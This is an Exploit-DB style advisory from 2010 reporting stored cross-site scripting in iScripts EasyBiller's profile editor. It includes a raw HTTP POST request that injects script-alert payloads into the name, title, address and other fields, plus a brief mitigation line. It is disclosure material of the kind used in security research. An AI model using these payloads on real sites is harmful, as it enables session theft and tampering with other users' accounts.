iScripts EasyBiller Cross Site Scripting Vulnerabilities

vendor:

EasyBiller

by:

Sangteamtham

7,5

CVSS

HIGH

Cross Site Scripting (XSS)

CWE

Product Name: EasyBiller

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

iScripts EasyBiller Cross Site Scripting Vulnerabilities

When attackers login with user information, attackers can update their profile by injecting javascript into fields like 'First Name' and 'Title'.

Mitigation:

Input validation and output encoding should be used to prevent XSS attacks.

Source

Exploit-DB raw data:

$-------------------------------------------------------------------------------------------------------------------
$  iScripts EasyBiller Cross Site Scripting Vulnerabilities
$  Author   : Sangteamtham                                                                    
$  Home     : Hcegroup.net                                               
$  Download : http://www.iscripts.com/easybiller/   
$  Date     : 02/07/2010
$  Email    : sangteamhtham@gmail.com                 					           
$******************************************************************************************
$Exploit:
$
$ Cross Site Scripting (XSS):
$
$ When attackers login with your user infomation, attackers update their profile by injecting javascript into fields like
$ "First Name","Title"
$ 
Code:
*********************************************************************************************
Host: www.server.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://server/editprofile.php
Cookie: PHPSESSID=110cc00db753eaf050d491dd62c7ebb6; fcspersistslider1=6; __utma=227100805.1045538127.1278085802.1278085802.1278085802.1; __utmb=227100805; __utmc=227100805; __utmz=227100805.1278085802.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); flag_entryformfilled=easywebsurvey
Content-Type: application/x-www-form-urlencoded
Content-Length: 906
txtEmail=user%40server&txtName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtlastName=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtTitle=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtOrganization=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3B%3C%2Fscript%3E&txtAddress=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtCity=%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&txtState=California%22%3E%22%3E%3Cscript%3Ealert%28%22Sangteamtham+was+here%22%29%3C%2Fscript%3E&ddlCountry=UnitedStates&txtZIP=684567&txtPhone=9823134545&txtFax=98758282828478&cmbCssId=2&txtTechContactName=richard&txtTechContactEmail=richard%40gmail.com&txtBillContactName=samuel&txtBillContactEmail=samuel%40gmail.com&btnSubmit=Update

$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for more security
$
$
$--------------------------------------------------------------------------------------------------------------------